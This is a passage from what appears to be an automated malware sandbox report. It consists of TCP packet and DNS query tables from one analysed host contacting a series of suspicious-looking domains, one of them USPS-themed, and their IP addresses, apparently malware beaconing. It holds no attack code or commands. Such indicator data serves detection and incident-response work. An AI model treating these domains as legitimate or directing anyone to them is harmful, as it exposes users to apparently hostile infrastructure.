                                                                            Jan 13, 2025 10:21:11.486103058 CET805002845.130.41.107192.168.2.4
                                                                            Jan 13, 2025 10:21:16.826560974 CET5002980192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:16.831382990 CET805002985.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:16.831471920 CET5002980192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:16.850492001 CET5002980192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:16.855305910 CET805002985.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:18.348877907 CET5002980192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:18.353992939 CET805002985.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:18.354044914 CET5002980192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:19.370495081 CET5003080192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:19.375394106 CET805003085.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:19.375510931 CET5003080192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:19.394483089 CET5003080192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:19.399373055 CET805003085.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:20.897525072 CET5003080192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:21.066689968 CET805003085.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:21.066840887 CET5003080192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:21.915040016 CET5003180192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:21.920027971 CET805003185.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:21.920104980 CET5003180192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:21.941726923 CET5003180192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:21.946698904 CET805003185.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:21.946717978 CET805003185.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:21.946731091 CET805003185.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:21.946737051 CET805003185.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:21.946813107 CET805003185.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:21.946825981 CET805003185.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:21.946847916 CET805003185.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:21.946870089 CET805003185.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:21.946882963 CET805003185.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:23.458252907 CET5003180192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:23.463232994 CET805003185.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:23.465576887 CET5003180192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:24.478506088 CET5003280192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:24.483478069 CET805003285.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:24.483586073 CET5003280192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:24.495415926 CET5003280192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:24.500298023 CET805003285.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:25.172451973 CET805003285.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:25.172534943 CET805003285.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:25.172683954 CET5003280192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:25.175415039 CET5003280192.168.2.485.159.66.93
                                                                            Jan 13, 2025 10:21:25.180591106 CET805003285.159.66.93192.168.2.4
                                                                            Jan 13, 2025 10:21:30.435045004 CET5003380192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:30.439990997 CET8050033199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:30.440053940 CET5003380192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:30.471219063 CET5003380192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:30.476326942 CET8050033199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:30.891829967 CET8050033199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:30.891875029 CET8050033199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:30.891912937 CET8050033199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:30.895680904 CET5003380192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:31.974905968 CET5003380192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:32.992636919 CET5003480192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:32.997687101 CET8050034199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:32.997795105 CET5003480192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:33.012820005 CET5003480192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:33.017745018 CET8050034199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:33.452137947 CET8050034199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:33.452184916 CET8050034199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:33.452224970 CET8050034199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:33.452280045 CET5003480192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:33.452280045 CET5003480192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:34.660180092 CET5003480192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:35.666551113 CET5003580192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:35.671492100 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:35.671613932 CET5003580192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:35.691648006 CET5003580192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:35.696696043 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:35.696727991 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:35.696782112 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:35.696810007 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:35.696862936 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:35.696891069 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:35.696918964 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:35.696950912 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:35.696978092 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:36.131838083 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:36.131860018 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:36.131877899 CET8050035199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:36.131921053 CET5003580192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:36.131968975 CET5003580192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:37.208260059 CET5003580192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:38.227741003 CET5003680192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:38.232698917 CET8050036199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:38.232774019 CET5003680192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:38.250113010 CET5003680192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:38.254939079 CET8050036199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:38.712024927 CET8050036199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:38.712049961 CET8050036199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:38.712081909 CET8050036199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:38.712172985 CET5003680192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:38.712214947 CET5003680192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:38.716788054 CET5003680192.168.2.4199.59.243.228
                                                                            Jan 13, 2025 10:21:38.721602917 CET8050036199.59.243.228192.168.2.4
                                                                            Jan 13, 2025 10:21:44.019714117 CET5003780192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:44.024522066 CET805003738.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:44.024622917 CET5003780192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:44.042407990 CET5003780192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:44.047204018 CET805003738.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:45.554645061 CET5003780192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:45.607187986 CET805003738.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:46.572864056 CET5003880192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:46.577759027 CET805003838.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:46.577843904 CET5003880192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:46.603822947 CET5003880192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:46.608711958 CET805003838.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:48.114872932 CET5003880192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:48.167521954 CET805003838.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:49.186963081 CET5003980192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:49.198997021 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:49.200623989 CET5003980192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:49.223630905 CET5003980192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:49.234289885 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:49.234302998 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:49.234319925 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:49.234328985 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:49.235272884 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:49.235281944 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:49.235356092 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:49.235364914 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:49.235373020 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:50.739578962 CET5003980192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:50.787199974 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:51.771760941 CET5004080192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:51.776545048 CET805004038.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:21:51.776987076 CET5004080192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:51.827770948 CET5004080192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:21:51.832581997 CET805004038.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:22:05.438368082 CET805003738.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:22:05.438684940 CET5003780192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:22:07.918448925 CET805003838.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:22:07.918499947 CET5003880192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:22:10.596115112 CET805003938.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:22:10.596255064 CET5003980192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:22:13.140486002 CET805004038.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:22:13.142898083 CET5004080192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:22:13.145649910 CET5004080192.168.2.438.22.89.164
                                                                            Jan 13, 2025 10:22:13.150512934 CET805004038.22.89.164192.168.2.4
                                                                            Jan 13, 2025 10:22:18.174619913 CET5004180192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:18.179439068 CET805004168.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:18.179507017 CET5004180192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:18.201894045 CET5004180192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:18.206756115 CET805004168.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:19.123142004 CET805004168.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:19.123167038 CET805004168.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:19.123297930 CET805004168.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:19.123445034 CET5004180192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:19.710647106 CET5004180192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:20.728368044 CET5004280192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:20.733274937 CET805004268.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:20.733361959 CET5004280192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:20.753727913 CET5004280192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:20.758780956 CET805004268.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:21.584534883 CET805004268.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:21.584578991 CET805004268.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:21.584686041 CET5004280192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:21.584903002 CET805004268.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:21.585097075 CET5004280192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:22.255260944 CET5004280192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:23.333542109 CET5004380192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:23.338495016 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:23.338723898 CET5004380192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:23.389830112 CET5004380192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:23.394731998 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:23.394850969 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:23.394866943 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:23.394893885 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:23.394908905 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:23.394925117 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:23.394938946 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:23.394964933 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:23.394979954 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:24.168641090 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:24.168668032 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:24.168694973 CET805004368.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:24.168710947 CET5004380192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:24.168768883 CET5004380192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:24.913155079 CET5004380192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:26.254404068 CET5004480192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:26.403584957 CET805004468.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:26.403733015 CET5004480192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:26.412976980 CET5004480192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:26.418005943 CET805004468.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:27.222404957 CET805004468.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:27.222455978 CET805004468.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:27.222498894 CET805004468.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:27.222582102 CET5004480192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:27.222582102 CET5004480192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:27.226469994 CET5004480192.168.2.468.65.122.71
                                                                            Jan 13, 2025 10:22:27.231688023 CET805004468.65.122.71192.168.2.4
                                                                            Jan 13, 2025 10:22:50.276418924 CET5004580192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:50.281413078 CET8050045103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:50.281505108 CET5004580192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:50.300527096 CET5004580192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:50.305538893 CET8050045103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:51.061316013 CET8050045103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:51.061567068 CET5004580192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:51.802412033 CET5004580192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:51.807367086 CET8050045103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:52.821506023 CET5004680192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:52.826477051 CET8050046103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:52.826561928 CET5004680192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:52.839616060 CET5004680192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:52.844419956 CET8050046103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:53.603596926 CET8050046103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:53.606826067 CET5004680192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:54.349659920 CET5004680192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:54.480151892 CET8050046103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:55.368238926 CET5004780192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:55.373231888 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:55.376801968 CET5004780192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:55.391376019 CET5004780192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:55.391396999 CET5004780192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:55.396222115 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:55.396311045 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:55.396338940 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:55.396390915 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:55.396416903 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:55.396464109 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:55.396490097 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:55.396516085 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:55.396558046 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:56.176372051 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:56.176459074 CET5004780192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:56.896104097 CET5004780192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:56.904369116 CET8050047103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:57.914760113 CET5004880192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:57.920737982 CET8050048103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:57.920977116 CET5004880192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:57.930140018 CET5004880192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:57.936772108 CET8050048103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:58.700248003 CET8050048103.174.136.137192.168.2.4
                                                                            Jan 13, 2025 10:22:58.700368881 CET5004880192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:58.893163919 CET5004880192.168.2.4103.174.136.137
                                                                            Jan 13, 2025 10:22:58.900151968 CET8050048103.174.136.137192.168.2.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 13, 2025 10:19:26.020750999 CET6271553192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:19:26.029572964 CET53627151.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:19:31.039660931 CET5625353192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:19:31.305306911 CET53562531.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:19:46.836705923 CET5210353192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:19:46.953784943 CET53521031.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:19:55.008567095 CET5638753192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:19:55.023094893 CET53563871.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:20:08.337532043 CET5366953192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:20:08.493910074 CET53536691.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:20:22.618860006 CET5910453192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:20:22.664771080 CET53591041.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:20:36.306376934 CET5425553192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:20:36.318269014 CET53542551.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:20:49.665443897 CET5137653192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:20:49.677690983 CET53513761.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:21:02.964615107 CET6445853192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:21:03.074553967 CET53644581.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:21:16.493177891 CET5068753192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:21:16.821794987 CET53506871.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:21:30.181581020 CET5367253192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:21:30.432274103 CET53536721.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:21:43.733310938 CET5403953192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:21:44.016747952 CET53540391.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:22:18.149940968 CET6300253192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:22:18.171596050 CET53630021.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:22:32.243913889 CET5134453192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:22:32.252396107 CET53513441.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:22:40.305490971 CET5222953192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:22:40.314506054 CET53522291.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:22:48.369126081 CET5121053192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:22:49.365101099 CET5121053192.168.2.41.1.1.1
                                                                            Jan 13, 2025 10:22:50.273134947 CET53512101.1.1.1192.168.2.4
                                                                            Jan 13, 2025 10:22:50.273178101 CET53512101.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jan 13, 2025 10:19:26.020750999 CET192.168.2.41.1.1.10x7d75Standard query (0)www.biocaracol.onlineA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:19:31.039660931 CET192.168.2.41.1.1.10x1cecStandard query (0)www.zucchini.proA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:19:46.836705923 CET192.168.2.41.1.1.10x1e5fStandard query (0)www.yacolca.digitalA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:19:55.008567095 CET192.168.2.41.1.1.10xa488Standard query (0)www.ogbos88.cyouA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:20:08.337532043 CET192.168.2.41.1.1.10x6901Standard query (0)www.esscosaathi.infoA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:20:22.618860006 CET192.168.2.41.1.1.10x6a75Standard query (0)www.myfastuploader.sbsA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:20:36.306376934 CET192.168.2.41.1.1.10x918eStandard query (0)www.grimbo.boatsA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:20:49.665443897 CET192.168.2.41.1.1.10x9722Standard query (0)www.sesanu.xyzA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:21:02.964615107 CET192.168.2.41.1.1.10x664cStandard query (0)www.sovz.proA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:21:16.493177891 CET192.168.2.41.1.1.10x6121Standard query (0)www.tabyscooterrentals.xyzA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:21:30.181581020 CET192.168.2.41.1.1.10xb7a9Standard query (0)www.sql.danceA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:21:43.733310938 CET192.168.2.41.1.1.10x2d71Standard query (0)www.811371bb10.buzzA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:18.149940968 CET192.168.2.41.1.1.10xc6fcStandard query (0)www.rtp189z.latA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:32.243913889 CET192.168.2.41.1.1.10x45f5Standard query (0)www.glyttera.shopA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:40.305490971 CET192.168.2.41.1.1.10xddb2Standard query (0)www.usps-infora.topA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:48.369126081 CET192.168.2.41.1.1.10xdd30Standard query (0)www.u75lmwdgp0du.homesA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:22:49.365101099 CET192.168.2.41.1.1.10xdd30Standard query (0)www.u75lmwdgp0du.homesA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 13, 2025 10:19:26.029572964 CET1.1.1.1192.168.2.40x7d75Name error (3)www.biocaracol.onlinenonenoneA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:19:31.305306911 CET1.1.1.1192.168.2.40x1cecNo error (0)www.zucchini.pro199.59.243.228A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:19:46.953784943 CET1.1.1.1192.168.2.40x1e5fName error (3)www.yacolca.digitalnonenoneA (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:19:55.023094893 CET1.1.1.1192.168.2.40xa488No error (0)www.ogbos88.cyou104.21.13.141A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:19:55.023094893 CET1.1.1.1192.168.2.40xa488No error (0)www.ogbos88.cyou172.67.132.227A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:20:08.493910074 CET1.1.1.1192.168.2.40x6901No error (0)www.esscosaathi.info15.197.240.20A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:20:22.664771080 CET1.1.1.1192.168.2.40x6a75No error (0)www.myfastuploader.sbsmyfastuploader.sbsCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 13, 2025 10:20:22.664771080 CET1.1.1.1192.168.2.40x6a75No error (0)myfastuploader.sbs136.243.225.5A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:20:36.318269014 CET1.1.1.1192.168.2.40x918eNo error (0)www.grimbo.boats104.21.18.171A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:20:36.318269014 CET1.1.1.1192.168.2.40x918eNo error (0)www.grimbo.boats172.67.182.198A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:20:49.677690983 CET1.1.1.1192.168.2.40x9722No error (0)www.sesanu.xyz199.192.21.169A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:21:03.074553967 CET1.1.1.1192.168.2.40x664cNo error (0)www.sovz.pro45.130.41.107A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:21:16.821794987 CET1.1.1.1192.168.2.40x6121No error (0)www.tabyscooterrentals.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 13, 2025 10:21:16.821794987 CET1.1.1.1192.168.2.40x6121No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 13, 2025 10:21:16.821794987 CET1.1.1.1192.168.2.40x6121No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:21:30.432274103 CET1.1.1.1192.168.2.40xb7a9No error (0)www.sql.dance199.59.243.228A (IP address)IN (0x0001)false
                                                                            Jan 13, 2025 10:21:44.016747952 CET1.1.1.1192.168.2.40x2d71No error (0)www.811371bb10.buzzns91.l4y.cnCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 13, 2025 10:21:44.016747952 CET1.1.1.1192.168.2.40x2d71No error (0)ns91.l4y.cn38.22.89.164A (IP address)IN (0x0001)false
